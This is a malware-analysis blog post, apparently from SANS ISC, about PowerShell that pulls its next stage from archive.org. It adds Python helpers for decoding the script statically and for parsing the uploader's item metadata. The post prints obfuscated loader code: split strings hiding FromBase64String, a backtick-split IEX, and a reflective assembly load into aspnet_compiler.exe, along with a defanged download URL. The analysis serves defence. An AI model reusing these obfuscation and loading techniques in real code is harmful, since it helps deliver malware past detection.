SANS Internet Storm Center

Malicious Content Delivered Through archive.org

Published: 2021-07-29
Last Updated: 2021-07-29 07:18:21 UTC
by Xavier Mertens (Version: 1)

archive.org[1], also known as the "Wayback Machine", is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like a regular search engine and continuously crawls the Internet with bots. But there is another way to get content onto archive.org: you may create an account and upload content yourself.

I found a piece of malicious PowerShell that uses archive.org to download the next-stage payload. Its score on VT is only 5/58[3] (SHA256: 2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

# Decoder: the method name "FromBase64String" is split into fragments to defeat simple string matching
FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
  return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
# Next-stage URL hosted on archive.org (defanged here); unused by the snippet itself, referenced by the decoded stage
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
# Base64-encoded second stage (truncated)
$JUANADEARCO = 'JEZWWVRGWVRGWUZZRllGWUZHWT0 ... [removed] ... VFJEVAp9CklFWCB2aXA='
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
# Pipe the decoded text into IEX (Invoke-Expression); the backticks split the alias to evade keyword matching
$Run=($HBAR -Join '')|I`E`X

The Base64 data is decoded and contains more PowerShell code that works as a downloader. It fetches the next payload from archive.org, dumps it to disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))
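The obfuscation in the script above (concatenated string fragments hiding FromBase64String, a backtick-split IEX, a Base64 blob that becomes the downloader) can be peeled off statically, without ever running the PowerShell. The following Python triage helper is an added example, not the diary's code or the malware author's: it folds the string concatenations, strips the backticks, decodes every Base64 assignment it finds, and reports the indicators a defender cares about at each stage, including the Reflection.Assembly Load / aspnet_compiler.exe line shown above. The script it analyses is constructed to mirror the diary's structure; the Base64 stage carries only a harmless Write-Host plus the quoted reflective-load line, with $H5 and $H1 as placeholder variables.

```python
import base64
import re

# Constructed sample, not the diary's real script: it imitates the structure seen there
# (string concatenation hiding "FromBase64String", a backtick-split IEX, a defanged
# archive.org URL). The Base64 stage carries a harmless Write-Host plus the
# reflective-load line quoted in the diary, with placeholder variables $H5 and $H1.
PAYLOAD = (
    'Write-Host "stage 2 (constructed)"\n'
    "[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run')"
    ".Invoke($null,[object[]] ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe',$H1))"
)
SAMPLE_SCRIPT = f'''
FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($E)
{{
  $x = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $G = [Text.Encoding]::Utf8.GetString([Convert]::$x($E))
  return $G
}}
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$JUANADEARCO = '{base64.b64encode(PAYLOAD.encode("utf-8")).decode("ascii")}'
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join '')|I`E`X
'''

CONCAT_RE = re.compile(r'"([^"\n]*)"\s*\+\s*"([^"\n]*)"')          # "a"+"b"
BACKTICK_RE = re.compile(r'(?<=\w)`(?=\w)')                         # I`E`X
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=]{16,})'")    # $var = '<base64>'
URL_RE = re.compile(r"""(?:hxxps?|https?)://[^\s'"]+""", re.IGNORECASE)
IEX_RE = re.compile(r'\b(?:IEX|Invoke-Expression)\b', re.IGNORECASE)


def fold_concatenations(script: str) -> str:
    """Merge adjacent double-quoted literals joined with '+' until nothing changes."""
    previous = None
    while previous != script:
        previous = script
        script = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
    return script


def strip_backticks(script: str) -> str:
    """Drop backticks wedged between word characters (I`E`X -> IEX).
    Crude on purpose: a `n escape inside a string would be hit too, which is
    acceptable for triage but not for a faithful interpreter."""
    return BACKTICK_RE.sub('', script)


def decode_base64_assignments(script: str) -> dict:
    """Decode every $var = '<base64>' assignment without executing anything."""
    decoded = {}
    for name, value in ASSIGN_RE.findall(script):
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:
            continue
        # The diary's sample decodes as UTF-8; many loaders use UTF-16LE, so try both.
        for codec in ('utf-8', 'utf-16-le'):
            try:
                text = raw.decode(codec)
            except UnicodeDecodeError:
                continue
            if all(ch.isprintable() or ch in '\r\n\t' for ch in text):
                decoded[name] = text
                break
    return decoded


def indicators(text: str) -> dict:
    """Static indicators worth flagging in a script-block log or a sample."""
    return {
        'uses_base64': 'FromBase64String' in text,
        'uses_iex': bool(IEX_RE.search(text)),
        'reflective_load': '[Reflection.Assembly]::Load' in text,
        'lolbin_host': 'aspnet_compiler.exe' in text.lower(),
        'urls': URL_RE.findall(text),
    }


def triage(script: str) -> dict:
    """Normalise the outer script, then decode and inspect each embedded stage."""
    normalised = strip_backticks(fold_concatenations(script))
    report = {'outer': indicators(normalised), 'stages': {}}
    for name, text in decode_base64_assignments(normalised).items():
        inner = strip_backticks(fold_concatenations(text))
        report['stages'][name] = {'text': inner, 'indicators': indicators(inner)}
    return report


if __name__ == '__main__':
    result = triage(SAMPLE_SCRIPT)
    print('outer:', result['outer'])
    for name, stage in result['stages'].items():
        print(f'stage ${name}:', stage['indicators'])
```

Run it as-is to see the outer script flagged for Base64 plus IEX and the decoded stage flagged for the reflective load into aspnet_compiler.exe; point `triage()` at a real script body (for instance the text of a PowerShell ScriptBlock log entry) to get the same report for it.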

Let's put aside the malware (a classic one) and focus on the file grabbed from archive.org. If you go one directory up, you'll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<metadata>
<identifier>server-lol-123_20210606</identifier>
<mediatype>texts</mediatype>
<collection>opensource</collection>
<description>Server_lol_123</description>
<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<subject>Server_lol_123</subject>
<title>Server Lol 123</title>
<uploader>moxey68914@revutap.com</uploader>
<collection>community</collection>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
<curation>
[curator]validator@archive.org[/curator][date]20210606065744[/date][comment]checked for malware[/comment]
</curation>
<identifier-access>http://archive.org/details/server-lol-123_20210606</identifier-access>
<identifier-ark>ark:/13960/t9x17kx37</identifier-ark>
</metadata>
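Every archive.org item ships such a _meta.xml next to its files, so the fields above (uploader, upload date, the curation record with its "checked for malware" note) can be pulled out programmatically when you are pivoting on an item. The parser below is an added example, not the diary's code or an archive.org API: it flattens the metadata element, splits the BBCode-style [tag]...[/tag] curation record, and computes how long after the upload the curation entry was written. Its input is the XML reproduced above.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime

# Copied from the diary's server-lol-123_20210606_meta.xml listing (the page's own data).
META_XML = """<metadata>
<identifier>server-lol-123_20210606</identifier>
<mediatype>texts</mediatype>
<collection>opensource</collection>
<description>Server_lol_123</description>
<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<subject>Server_lol_123</subject>
<title>Server Lol 123</title>
<uploader>moxey68914@revutap.com</uploader>
<collection>community</collection>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
<curation>
[curator]validator@archive.org[/curator][date]20210606065744[/date][comment]checked for malware[/comment]
</curation>
<identifier-access>http://archive.org/details/server-lol-123_20210606</identifier-access>
<identifier-ark>ark:/13960/t9x17kx37</identifier-ark>
</metadata>"""

# The curation record is written as [tag]value[/tag] pairs rather than XML children.
CURATION_TAG_RE = re.compile(r'\[(\w+)\](.*?)\[/\1\]', re.DOTALL)


def parse_curation(text: str) -> dict:
    """Turn '[curator]x[/curator][date]y[/date]...' into {'curator': x, 'date': y, ...}."""
    return {m.group(1): m.group(2).strip() for m in CURATION_TAG_RE.finditer(text)}


def parse_item_metadata(xml_text: str) -> dict:
    """Flatten <metadata>; tags that repeat (collection does, above) become lists."""
    root = ET.fromstring(xml_text)
    fields = defaultdict(list)
    for child in root:
        text = (child.text or '').strip()
        fields[child.tag].append(parse_curation(text) if child.tag == 'curation' else text)
    return {tag: vals[0] if len(vals) == 1 else vals for tag, vals in fields.items()}


def seconds_between_upload_and_check(fields: dict) -> int:
    """Delay between addeddate and the curation date (the 'checked for malware' entry)."""
    added = datetime.strptime(fields['addeddate'], '%Y-%m-%d %H:%M:%S')
    checked = datetime.strptime(fields['curation']['date'], '%Y%m%d%H%M%S')
    return int((checked - added).total_seconds())


def attribution_summary(fields: dict) -> dict:
    """The handful of fields an analyst would pivot on or drop into a report."""
    return {
        'identifier': fields['identifier'],
        'uploader': fields['uploader'],
        'collections': fields['collection'],
        'uploaded': fields['addeddate'],
        'scanner': fields['scanner'],
        'malware_check': fields['curation'].get('comment'),
        'check_delay_seconds': seconds_between_upload_and_check(fields),
    }


if __name__ == '__main__':
    for key, value in attribution_summary(parse_item_metadata(META_XML)).items():
        print(f'{key}: {value}')
```

The uploader address and the identifier are the pivots: the same address can be searched for across other items, and the identifier maps straight to the https://archive.org/details/ page and the download path seen in the malware. The delay value shows the curation note was added about five minutes after upload, which is what an automated check, not a manual review, looks like.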

As you can see, this user uploaded a lot of files:

That's the wild Internet today: if you allow users to create an account and upload data, chances are high that the feature will be (ab)used to host malicious content. Indeed, archive.org is a top domain and is usually not blocked or tagged as malicious.

[1] https://archive.org
[2] https://web.archive.org/web/*/isc.sans.edu
[3] https://www.virustotal.com/gui/file/2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
